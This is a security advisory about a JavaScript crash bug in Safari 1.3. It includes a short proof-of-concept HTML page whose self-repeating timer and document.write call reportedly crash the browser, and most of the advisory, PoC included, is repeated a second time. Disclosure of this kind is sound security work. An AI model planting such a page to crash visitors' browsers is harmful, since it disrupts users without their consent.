Apple Safari Javascript Crafted Function Body DoS
Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations.
The exact cause of this issue is currently unknown. This BID will be updated as further information is disclosed.
This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception.
Safari version 1.3 is reported susceptible to this issue. Other versions may also be affected.
<html>
<script name="JavaScript">
<!--
function tickTock()
{
setTimeout("tickTock()", 1000);
thisTime = new Date()
seconds = thisTime.getSeconds()
document.write(seconds);
}
// -->
</script>
<body onLoad="tickTock();">
</html>
Credit:
This vulnerability was disclosed by Patrick Webster.
About OSI Security:
OSI Security is an independent network and computer security auditing
and consulting company based in Sydney, Australia. We provide internal
and external penetration testing, vulnerability auditing and wireless
site audits, vendor product assessments, secure network design,
forensics and risk mitigation services.
We can be found at http://www.osisecurity.com.au/
The exact cause of this issue is currently unknown. This BID will be updated as further information is disclosed.
This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception.
Safari version 1.3 is reported susceptible to this issue. Other versions may also be affected.
<html>
<script name="JavaScript">
<!--
function tickTock()
{
setTimeout("tickTock()", 1000);
thisTime = new Date()
seconds = thisTime.getSeconds()
document.write(seconds);
}
// -->
</script>
<body onLoad="tickTock();">
</html>
Credit:
This vulnerability was disclosed by Patrick Webster.
About OSI Security:
OSI Security is an independent network and computer security auditing
and consulting company based in Sydney, Australia. We provide internal
and external penetration testing, vulnerability auditing and wireless
site audits, vendor product assessments, secure network design,
forensics and risk mitigation services.
We can be found at http://www.osisecurity.com.au/